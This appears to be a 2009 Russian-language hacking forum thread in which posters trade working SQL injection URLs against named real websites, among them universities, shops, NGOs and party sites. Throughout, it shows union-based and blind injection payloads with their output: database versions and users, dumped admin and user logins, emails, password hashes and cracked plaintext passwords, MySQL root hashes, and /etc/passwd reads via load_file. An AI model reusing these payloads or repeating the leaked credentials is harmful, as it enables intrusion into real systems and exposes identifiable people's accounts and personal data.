http://www.hosse.bg/bg/materials_details.php?id_d=228+AND+ASCII(SUBSTRING ((select+y=1..3()),1,1))=x=1..3-- &vid=0
y1=version
y2=database
y3=user
x1=53,46,48,46,54,55,45,99,111,109,109,117,110,105 ,116,121
x2=104,111,115,115,101,98,103,95,72,111,115,115,10 1
x3=104,111,115,115,101,98,103,95,115,105,116,101,6 4,108,111,99,97,108,104,111,115,116
Version : 5.0.67-community
Database : hossebg_Hosse
User : hossebg_site@localhost
http://lighthouse-bg.com/en/news_details.php?id=12+AND+ASCII(SUBSTRING((select +y=1..3() ),1,1))=x=1..3
x1=52,46,49,46,50,50,45,108,111,103
x2=76,105,103,104,116,72,111,117,115,101
x3=108,105,103,104,116,104,111,117,115,101,95,115, 105,116,101,64,108,111,99,97,108,104,111,115,116
Version : 4.1.22-log
Database : LightHouse
User : lighthouse_site@localhost
spherics
26.03.2009, 20:13
http://www.img.ufl.edu/php/project.php?id=798798756554343+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6,7, 8,9,10,11--
Database Version: 5.0.27
Database name: img
User name: img_www@localhost
http://www.img.ufl.edu/php/project.php?id=798798756554343+UNION+SELECT+1,2,AE S_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(e mail,0x3a,username,0x3a,password)+FROM+img.alumni+ LIMIT+10,1),0x3a),0x71),0x71),4,5,6,7,8,9,10,11--
email : username : password
:gqwang@mae.ufl.edu:gqwang:e626af9acac0165ac2c255c 50ab69635
:wandell@ufl.edu:t99_wln:d56866603fab6a244ffede466 5c1bd81
:t98_ftn@t.kth.se:mfragg:25d55ad283aa400af464c76d7 13c07ad хэш MD5:25d55ad283aa400af464c76d713c07ad:12345678
:redraq@ufl.edu:nlynsue:3b29022319c8cc1cfdf6bf02bb 9e3b7b
:r2@ufl.edu:rtaylor:a1fbaf89ee953ac23463e3f5004eee b3
:papila@ufl.edu:papila:1d251a2cfe2e5ab8c3d3ae444a4 120c7
:stoyanov@ufl.edu:Alex:d17e766901035c27e26912839ff 6d5c2 хэш MD5:d17e766901035c27e26912839ff6d5c2:lissi
:akopa@ufl.edu:akopa:63eee61b891edc21435bc7937c11e aa6 хэш MD5:63eee61b891edc21435bc7937c11eaa6:stratocaster
:mmhuang@ufl.edu:mhuang:1a7da1aab8b86aa59090f0e803 254a4b хэш MD5:1a7da1aab8b86aa59090f0e803254a4b:yhuang12
:wukh@grove.ufl.edu:khwu:104aa947ad49c59f7f3961bd5 33891d6 хэш MD5:104aa947ad49c59f7f3961bd533891d6:topgun11
:maojiaoh@ufl.edu:maojiao:a8631c4151a95ad515e8aeab f6f7471e
admin : d41d8cd98f00b204e9800998ecf8427e
PR - 4
http://www.hillbilly-music.com/artists/story/index.php?id=13495/**/union/**/select/**/1,2,3,4,5,concat_ws(0x3a,version(),user(),database ()),7/*
Version: 4.0.21
User: cowboy54@38.113.244.81
Database: cowboy54
PageRank = 5
http://slought.org/toc/archives/display4.php?id=10168768754384+union+select+1,2,3, 4,5,6,7,concat_ws(0x3a,version(),user(),database() ),9,10,11,12,13,1,15,16,17,18,19,20,21,22,23,24,25 ,26,27,28,29--
Version: 4.0.27-log
User: slough@localhost
Database: slough
http://www.collectionauto.ru/index.php?menu=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9--
Database Version: 5.0.67-community
Database name: sonnec_auto
User name: sonnec_sunex@localhost
DrAssault
26.03.2009, 20:18
http://www.dropball.ru/news.php?type=1&id=1371%20union%20select%201,2,3,4,5,6,7,8,9,10,11 ,12,unhex(hex(concat(U_Username,0x3a,U_Password))) ,14,15,16,17,18,19,20,21%20from%20w3t_Users%20limi t%2089,1+--+
Вывод в title страницы...
http://www.inacif.gob.gt/index.php?showPage=125&nwid=-7'+union+select+1,2,version(),4,5,6,load_file('/etc/passwd'),8,9,10/*
Version: 4.0.26
Database: inacif_gob_gt
User: inacif@localhost
http://www.baltimoretechnologypark.com/index.php?showPage=152&nwid=-58'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10,11/*
Version: 4.0.26
Database: baltimoretechnologypark_com
User: btpark@localhost
Инет магазин
http://avb.com.ua/show_tovar.php?id=-352334 union select 1,2,3,login,5,password,7,8,9,10,11 FROM raznoe --
админ :: пасс
administrator :: price
M.W.N.N.
27.03.2009, 01:51
http://new-list.com/recommend.php?id=9822+union+select+1,2,concat(vers ion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10, 11,12,13+limit+1,1/*
version():5.0.22-log
database():newlist_articles
user():newlist@localhost
__
http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,11,con cat(version(),0x3a,database(),0x3a,user()),13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.u ser+limit+1,1/*
version():5.0.32-Debian_7etch8-log
database():accesat
user():root@localhost
http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,concat (user,0x3a,password),12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27+from+mysql.user+limit+1,1/*
root:*5D56577929EBE57FA00A78DCEC07B00F70FE86C9
http://www.accesat.be/index.php?view=info&id=733%27+union+select+1,2,3,4,5,6,7,8,9,10,load_f ile(%27/etc/passwd%27),12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27+limit+1,1/*
__
http://www.bcd-fed.be/events.php?action=info&id=36%27+union+select+1,2,3,4,concat(version(),0x3 a,database(),0x3a,user()),6+limit+1,1/*
version():5.0.18-nt
database():bcd-fed
user():bcd-fed003@localhost
__
http://www.dereserven.be/index.php?menu=Ploeg&pag=Info&id=55+union+select+1,concat(version(),0x3a,databas e(),0x3a,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18/*
version():4.1.22-standard-log
database():wsouden_start
user():wsouden_wsouden@localhost
завтрак
http://www.communityservice.wustl.edu/groups/printout.php?gid=-64'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37/*
User: commserv@localhost
Version: 4.0.14-max
Dbname: commserv
news
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.lib.byu.edu/subsutility/viewGuide.php?gid=-364+union+select+1,version()--
Dbname: byudbs
Username: byudbs@web1.lib.byu.edu
Version: 5.0.26-log
http://www.karcherbg.com/newsview.php?id=-21+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6
Database Version: 5.0.67-community
Database name: karcherb_karcher
User name: karcherb_site@localhost
http://www.nmkconsult.com/services_details.php?id=-3+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5
Database Version: 5.0.67-community
Database name: nmkconsu_NMKCONSULT
User name: nmkconsu_site@localhost
Интересное дело, так как на сайте не было динамического параметра типа id= , я нашел вкладку новостей, но там всего лишь одна новость поэтому выглядело просто news.php , подтставил news.php?id=1 а дальше уже по класической схеме раскрутил скулю.
http://www.ekip6.net/bg/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9
Database Version: 5.0.67-community-log
Database name: ekip6ne_Ekip6
User name: ekip6ne_site@localhost
mailbrush
27.03.2009, 14:50
http://www.harryhomers.co.uk/et/stats/hhs/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
harry_headsh@localhost:harry_statshhs:5.0.67-community
http://whetstats.sonyonline.de/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
U480002@jenkins.stor:DB480002:5.0.67-log
http://lapdclan.eu/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
lapdceba@localhost:usrdb_lapdceba_stats:5.0.51a
http://pro-q3dm6.de/27962/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@localhost:vsp:5.0.27
http://theaodclan.com/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
theaod_vspuser@localhost:theaod_vsp:5.0.67-community
http://www.wolfet.fr/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp-stat@localhost:vspstat:5.0.32-Debian_7etch8-log
http://vsp.creativehosting.nl/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
vsp@c1n1.86id.nl:vsp:5.0.32-Debian_7etch6-log
http://afterhourgamers.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
ahgamers_stats@localhost:ahgamers_stats:5.0.67-community
http://www.exiledunit.com/stats/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
exiledun_stats@localhost:exiledun_stats:4.1.22-standard
site: kdvorik.ru
http://www.kdvorik.ru/katalog.php?r=-0+union+select+1,2,3,4,5,concat_ws(0x3a,name,email )+from+users--
database: 4.0.27-max-log
name_database: dvorik
user: dvorik@v46.valuehost.ru
http://www.kdvorik.ru/admin
column: users
log: asvitov
pass: :(
email: asvitov@avallon.ru
DrAssault
27.03.2009, 15:55
http://www.l-oko.ru/goonline.php?id=-1%27+union+select+1,2,concat_ws(0x3a,user_id,usern ame,user_password),4,5,6,7,8+from+phpbb_users+limi t+1,1+--+
http://www.tamaltd.com/bg/products.php?gr=-5+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8
Database Version: 4.1.20
Database name: tamaltd
User name: tamaltd@localhost
http://www.farin.bg/medcontent.php?pub=n&med=-5+union+select+1,concat_ws(0x3a,version(),database (),useR())
Database Version: 5.0.32-Debian_7etch5-log
Database name: wdbn
User name: mrtn@localhost
DrAssault
27.03.2009, 16:52
http://www.crossroadsdg.com/news_more.php?id=1+union+select+1,concat_ws(0x3a3a 3a,id,username,password),3,4+from+users+--+
Вывод: 3:::admin:::6692e9c358a3031d
http://www.interay.eu/bg/product.php?brand=in_the_store&id=-9+union+select+1,concat_ws(0x3a,version(),database (),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33
Database Version: 5.0.67-community
Database name: interay_interay
User name: interay_site@localhost
http://www.briz-bulgarian-properties.bg/en/property_details.php?id=-247+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,con cat_ws(0x3a,version(),database(),useR()),15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39
Database Version: 5.0.67-community
Database name: brizbg_BRIZ
User name: brizbg_site@localhost
DrAssault
27.03.2009, 17:06
http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+having+1=1--
Вывод: tblProducts.ProductID
http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProduct s.ProductID+having+1=1--
Вывод: tblProducts.ProductNam
http://www.wirelessgalaxy.com/headsets/productdetails.asp?productid=1+group+by+tblProduct s.ProductID, tblProducts.ProductName+having+1=1--
Вывод: tblProducts.PartNo
http://www.rollco-bg.com/en/news_pop_en.php?id=-8+union+select+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),useR())
Database Version: 4.1.22
Database name: webrollco
User name: webrollco@webserv
http://www.longman-bulgaria.com/product.php?id=-137+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),useR()),5,6,7,8,9,10,11,12,13
Database Version: 5.0.67-community
Database name: longman_longman
User name: longman_site@localhost
M.W.N.N.
27.03.2009, 17:48
http://www.avnet.kuleuven.be/catalogus/showArticle.php?id=122+union+select+1,concat(versi on(),0x3a,database(),0x3a,user()),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16++from+mysql.user+limit+1,1/*
version():4.1.22-log
database():avnetweb
user():AVNetWEBuser@localhost
http://www.avnet.kuleuven.be/catalogus/showArticle.php?id=122+union+select+concat(user,0x 3a,password),concat(version(),0x3a,database(),0x3a ,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16++from+ mysql.user+limit+1,1/*
root:58ca972b03220752
DrAssault
27.03.2009, 17:58
http://www.swstechnology.com/equipment_product.php?ID=-1'+union+select+1,concat_ws(0x3a,ID,Username,Passw ord),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0+from+adminuser+--+
1:admin:24906u5j
http://www.adonay.bg/ru/galery_pop.php?id=-37+union+select+1,2,concat_ws(0x3a,version(),datab ase(),useR()),4,5,6
Database Version: 5.0.67-community
Database name: adonayb_Adiabat
User name: adonayb_site@localhost
http://www.cartel-sa.com/en/news_details.php?id=-2+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7,8
Database Version: 5.0.67-community
Database name: cartelsa_cartel
User name: cartelsa_site@localhost
http://www.dmsbg.com/projects_details_actual.php?id=-89+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6,7,8,9,10,11&start=0
Database Version: 4.0.27-log
Database name: DMS
User name: dmsbg@localhost
http://www.atlanticgamma.com/en/presentation.php?id=-12+union+select+1,,3,4,5,6,7,8
Database Version: 5.0.67-community
Database name: atlantic_Atlantic
User name: atlantic_site@localhost
http://www.pixel.bg/portfolio_details.php?dejnost=4&id=-27+union+select+1,concat_ws(0x3a,version(),databas e(),useR()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18
Database Version: 5.0.67-community
Database name: pixelb_Pixel
User name: pixelb_site@localhost
http://www.atriumbulgarianrealestate.com/property_details.php?id=-492+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,ver sion(),database(),useR()),60,61
Database Version: 5.0.67-community
Database name: atriumbu_Atrium
User name: atriumbu_site@localhost
http://www.restaurant.bg/designs/inox2_en.php?id=-4192+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,concat_ws(0x3a,version(),database(),useR()),67 ,68,69,70
Database Version: 5.0.67-community
Database name: restaura_restaurant
User name: restaura_site@localhost
http://www.bar.bg/designs/inox2_en.php?id=-301+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,4 8,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64, 65,concat_ws(0x3a,version(),database(),useR()),67, 68,69,70
Database Version: 5.0.67-community
Database name: barbg_bar
User name: barbg_site@localhost
http://www.real-estates.bg/en/property_details.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,versi on(),database(),useR()),60
Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost
http://www.bulgarianrealestates.bg/en/property_details.php?id=-8+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,concat_ws(0x3a,versi on(),database(),useR()),60
Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost
http://www.maxbg.bg/en/property_details.php?id=-7+union+select+1,2,concat_ws(0x3a,version(),databa se(),useR()),4,5,6,7
Database Version: 5.0.67-community
Database name: maxbgbg_MaxBG
User name: maxbgbg_site@localhost
ну и сайт компании которая создала все эти сайты
http://www.lemon.bg/news_details.php?id=28+and+substring((select+y=1.. 3() ),1,1)>x
y1=version
y2=database
y3=user
x1=53,46,48,46,54,55,45,99,111,109,109,117,110,105 ,116,121
x2=108,101,109,111,110,98,103,95,76,101,109,111,11 0
x3=108,101,109,111,110,98,103,95,115,105,116,101,6 4,108,111,99,97,108,104,111,115,116
Version :5.0.67-community
Database : lemonbg_Lemon
User : lemonbg_site@localhost
http://www.yogaold.com/index.php?ID=16&m=1&id=-133'+union+select+concat_ws(0x3a,version(),databas e(),user()),2/*
DrAssault
27.03.2009, 19:41
http://www.unity-online.ru/prod.php?ctov=pleers&where=model&all=4U&idm=-1+UNION+SELECT+1,2,3,4,table_name,6,7,8,9,10,11,12 ,13,14+from+information_schema.tables+limit+1,1/*
site: cultpohod.ru
http://www.cultpohod.ru/blockdetal.php?id=-267+union+select+1,2,3,4,5,concat_ws(0x3a3a,versio n(),database(),user()),7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22--
4.0.25::wwwcultpohodru::cultpoho@bux.hc.ru
DrAssault
27.03.2009, 20:30
http://www.ghp.kodar.net/index.php?id=-66+union+select+1,2,3,concat_ws(0x3a,id,name,passw ord),5,6,7+from+users/*
M.W.N.N.
27.03.2009, 22:25
http://www.phos.be/newsletter/index.php?id=00062+union+select+1,2,3,concat(versi on(),0x3a,database(),0x3a,user()),5+limit+1,1
version():5.0.67-log
database():phos_phos
user():phos_w@209.68.4.63
laedafess
28.03.2009, 00:55
http://www.waza.org/virtualzoo/factsheet.php?id=106-007-0093-001'+union+select+1,2,3,4,5,concat_ws(0x3a,user(), database(),version()),7,8,9,0,1,2,3,4,5,6,7,8,9,0, 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0/*&view=Monkeys
http://www.waza.org/virtualzoo/factsheet.php?id=106-007-0093-001'+union+select+1,2,3,4,5,concat_ws(0x3a,user,pa ss),7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9, 0,1,2,3,4,5,6,7,8,9,0+from+admins/*&view=Monkeys
administrator:648233e399d5b7f1dfe2f058fd24b391:man doua
Админка:
http://waza.org/admin/
user(): wazaorg_wazaweb@localhost
database(): wazaorg_Network
version(): 4.1.25
PR: 7
---------------------------------------------------
http://www.eyemagazine.com/issue.php?id=18+and+substring((select+version()+fr om+information_schema.tables+limit+0,1),1,1)=5/*
user(): haymarket@localhost
database(): haymarket
version(): 5.0.22-Debian_0ubuntu6.06.11-log
PR: 6
---------------------------------------------------
http://www.all-media.info/page.php?id=19'+union+select+1,concat_ws(0x3a,user (),database(),version()),3,4,5,6,7+limit+1,1/*
http://www.all-media.info/page.php?id=19'+union+select+1,load_file('/etc/passwd'),3,4,5,6,7+limit+1,1/*
user(): all-media@localhost
database(): allmedia
version(): 4.1.18-standard
PR: 5
M.W.N.N.
28.03.2009, 02:09
http://www.chateaudeseneffe.be/aVenirDetail.php?id=236+union+select+1,2,3,4,5,con cat(version(),0x3a,database(),0x3a,user()),7,8,9,1 0,11/*
version():5.0.22-community-max-nt
database():chateaudeseneffe
user():seneffe@cp287.mysite4now.com
DrAssault
28.03.2009, 07:46
http://www.positionsmart.co.za/admin/view_request.php?id=-6+union+select+1,2,3,concat_ws(0x3a,version(),user (),database()),5,6,7,8,9,10,11,12/*
Shaitan-Devil
28.03.2009, 09:58
ПР5 ТИЦ 240
http://www.butik.ru/goods/view/gd480001'+union+select+1,2,3,4,concat(email,0x3a,p ass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+fro m+user+limit+5,1/*.html
mailbrush
28.03.2009, 10:30
Все инъекции проверены на Антибоян (http://bestquest.info/sql/), после чего добавлены в его базу!
http://gamingusa.org/vsp-core/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
gusa_gusa@localhost:gusa_vsp:5.0.67-community-log
http://stat-cod2.lline.net/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
wage@localhost:cod2-statistic:5.0.32-Debian_7etch8-log
http://quake3.scatplus.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
root@localhost:vsp:5.1.30
http://quake3.scatplus.ru/themes/bismarck/gamestat.php?gameID=-1+union+select+LOAD_FILE(CHAR(47,101,116,99,47,112 ,97,115,115,119,100)),2&config=cfg-default.php
/etc/passwd
file_priv=Y
http://www.sp33d.ws/ffa-instagib/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
q3stats@localhost:q3stats:5.0.32-Debian_7etch8-log
http://nest.deb.hu/stat_sie/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
stat@localhost:stat_sie:5.0.32-Debian_7etch1
http://www.clan-victory.co.uk/vsp/pub/themes/bismarck/gamestat.php?gameID=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2&config=cfg-default.php
tilionor_clanvic@localhost:tilionor_clanvictory:5. 0.67-community-log
http://www.dcd.ru/more.php?id=-10+union+select+1,concat_ws(0x3a,version(),databas e(),user())--
db : 5.0.51
name_db : db_dcd
user : dcd@localhost
http : //www.dcd.ru/admin
http://www.sokol-mebel.ru/details/index.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13--
db : 5.0.67-log
name_db : u97809
user: u97809@10.10.223.241
http://www.sokol-mebel.ru/admin
Cennarios
28.03.2009, 14:41
http://www.univie.ac.at/unique/?tid=-1+union+select+1,2,3,4,5,concat_ws(0x3a3a,name,pwd ),7,8,9,10,11,12,13,14,15,16,17+from+users+limit+0 ,1/*
PR8
https://www.univie.ac.at/ZID/cms/ <- админка
laguia.us
Вобщем все банально, скуль:
http://www.laguia.us/articulo.php?id=-1242+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,use r(),database(),version()),9,10,11/*&edicion=93
revistalaguia@localhost:revistalaguia:5.0.45
т.к. мускул 5 смотрим с помощью INFORMATION_SCHEMA названия таблиц и полей
admuser-login,password
http://www.laguia.us/articulo.php?id=-1242+UNION+SELECT+1,2,3,4,5,6,7,concat_ws(0x3a,log in,password),9,10,11+FROM+admusers/*&edicion=93
admin:2cad00b70163edcf:calvin79
админка
http://www.laguia.us/admin/
Залить шелл не удалось =\
Cennarios
28.03.2009, 17:07
http://www.filzmooserhof.at/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,concat_ws(0x3a3a ,benutzername_usr,passwort_usr),28,29,30,31,32+fro m+user_usr+limit+0,1--
http://www.filzmooserhof.at/cms/
реги рабочие
P.S. 2 _I7ad1a_ Если постишь sql инъекцию - пиши полностью а не тупую кавычку инче минусы будешь получать
<<Строительная база>>
http://www.stroi-baza.ru/articles/one.php?id=-551+union+select+1,table_name,3,4,5,6,7,8,9+from+i nformation_schema.tables+limit+200,1--
db : 5.0.45
name_db : stroibaza
user : u23827@90.156.210.182
log: Troitsa
pass: 54321
<<Сеть мебельных салонов уголок>>
http://www.ugol-ok.ru/model-mebel.php?id=10869&grm=-701+union+select+1,concat_ws(0x3a,version(),databa se(),user()),3--
db : 4.0.27-log
name_db : skynet
user : skynet@zvm2.host.ru
ph1l1ster
28.03.2009, 18:44
dcmp.bc.edu
pr:6
http://dcmp.bc.edu/news.php?id=8+AND+ascii(lower(substring(concat(use r(),0x3a,version(),database()),2,1)))%3E1
Database Version: 3.23.53
Database name: dcmp
User name: root@localhost
water.grace.edu
http://water.grace.edu/news.php?id=-8+union+Select+1,2,3,4,concat(user,0x3a,password), 6+from+mysql.user
Database Version: 4.1.22-community-nt
Database name: water
User name: lehman_group@localhost
marketing.pdx.edu
http://marketing.pdx.edu/news.php?id=63+AND+ascii(lower(substring(concat(us er(),0x3a,version(),0x3a,database()),1,1)))%3E1
Database Version: 5.0.4
Database name: wwwpdxdb
User name: angell.bestla.oit.pdx.edu
Shaitan-Devil
28.03.2009, 18:57
Вся база как на ладони
http://shop.e12.cz/index.php?page=katalog&model=287&level=3&parent=-135+union+select+1,2,3,4,5,6,concat_ws(0x2e,table_ schema,table_name,column_name),8,9,10,11,12+from+i nformation_schema.columns/*
<<Диваны тут>>
http://www.divan-tam.ru/transform.php?id=-4+union+select+1,2,3,concat_ws(0xa,user_email,user _pass,user_nick,user_name)+from+admin_users--
db : 5.1.24-rc-log
name_db : db28065m
user : m28065@fhe10.hoster.ru
table: admin_user
log: Crusader
pass: 123321
email: ed@divan-tut.ru
M.W.N.N.
28.03.2009, 20:01
http://www.uitpers.be/artikel_view.php?id=1904+union+select+1,2,3,4,conc at(version(),0x3a,database(),0x3a,user()),6,7,8+li mit+1,1/*
version():4.1.25
database():uitpers_main
user():uitpers_main@localhost
http://gpstracks.nl/fietsroutes-be-limburg.php?id=1986+union+select+1,2,3,concat(vers ion(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+l imit+1,1
version():5.0.51a-24-log
database():gpstracks
user():gpstracks@localhost
<<Вся мебель России>>
http://www.allfurniture.ru/news.php?id=-162'+union+select+1,concat_ws(0x3a,version(),datab ase(),user())--+
db : 5.0.77
name_db : allfurniture2
user : allfurniture2@localhost
http://www.allfurniture.ru/phpmyadmin/
table: users
log: admin
pass: dczvt
+limit+x,x--+
spherics
28.03.2009, 21:59
PR - 6
http://www.sustainable.ie/directory/category.php?id=68768758595431+union+select+concat _ws(0x3a,version(),user(),database())--
Database Version: 5.0.45-community-log
Database name: cultiva_directory
User name: cultiva_admin@web20.hosting365.ie
PR - 6
http://www.activelink.ie/irish/organisation.php?id=397879879875457+union+select+1 ,2,3,concat_ws(0x3a,version(),user(),database()),5 ,6,7,8,9,10--
Version:4.1.20-log
User:active_r@localhost
Database:active_db1
PR - 6
http://www.snag.ie/eventinfo.php?id=36876876876098097+union+select+1, concat_ws(0x3a,version(),user(),database()),3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Version: 5.0.24-log
User: thenets_root@localhost
Database: thenets_snagdb
PR - 6
http://www.cusai.ie/person.php?id=37+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19,20--
Version : 5.0.51
User: beamsys_cusai@web6.novara.ie
Database: beamsys_cusai
PR - 6
http://www.bodywhys.ie/news.php?id=6565587687637987+union+select+1,2,3,4, 5,6,7,8,9,10,11,12,13,concat_ws(0x3a,version(),use r(),database()),15,16,17,18,19,20,21,22,23,24,25,2 6,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42, 43,44,45,46,47,48,49,50,51--
Version: 5.0.51a-community
User: bodywhys_7656@localhost
Database: bodywhys_news
PR - 6
http://www.ie.bilkent.edu.tr/en/seminars/seminar_detail.php?id=679877987377987+union+select +1,2,concat_ws(0x3a,version(),user(),database()),4 ,5,6,7,8,9,10--
Version:5.0.32-Debian_7etch6-log
User: www-user@localhost
Databa: sedepartment
PR - 5
http://www.comp.dit.ie/website07/staff.php?id=79855434379877+union+select+1,2,conca t_ws(0x3a,version(),user(),database()),4,5,6,7,8,9 ,10,11,12,13,14--
Version: 5.0.21-community-nt
User: bduggan@localhost
Database: soc
http://www.ifom-firc.it/research_news/abstract.php?id=99999+union+select+1,2,3,4,5,6,7,v ersion(),9/*
database: 4.1.19
name_database: news
user: researchnews@localhost
Помогите добить, пожалуйста :)
http://www.cra.org/govaffairs/content.php?cid=-22%20UNION%20SELECT%201%20--
2 f0ox по мне так это слепая скуля
http://www.cra.org/govaffairs/content.php?cid=22+AND+SUBSTRING((y() ),1,1)=x/*
y=version,database,user
x=33..127
Version : 4.0.27-standard
database : govsitecontent
User : root@localhost
M.W.N.N.
29.03.2009, 03:54
http://www.media-academie.be/index.php?id=172%27+union+select+1,2,3,4,5,6,7,8,9 ,concat(version(),0x3a,database(),0x3a,user()),11, 12/*
version():4.0.27-log
database():v160_mediaaca
user():v160_mediaaca@localhost
http://www.bamp-bg.org/read.php?id=-184+union+select+1,2,unhex(hex(concat_ws(0x3a,vers ion(),database(),useR()))),4,5,6,7,8
Database Version: 4.1.14-log
Database name: bamp
User name: _pmab@localhost
http://www.bamp-bg.org/read.php?id=-184+union+select+1,2,unhex(hex(concat_ws(0x3a,id,n ame,pass))),4,5,6,7,8+from+users
8:Elisande:bm/Th81Ou1WzYAI/WiSe4jamMk
6:test:bm8oUJ0UHJ/qgAIw90kQmVKa6w
<<Яблоко: Самара>>
http://www.samara.yabloko.ru/themes/index.phtml?id=-45+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9--
db: 5.0.32-Debian_7etch8-log
name_db: samara
user: samara@localhost
<<Яблоко: Новосибирск>>
http://www.nsk.yabloko.ru/press/publications/index.phtml?id=-294+union+select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x 3a,version(),database(),user()),12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29--
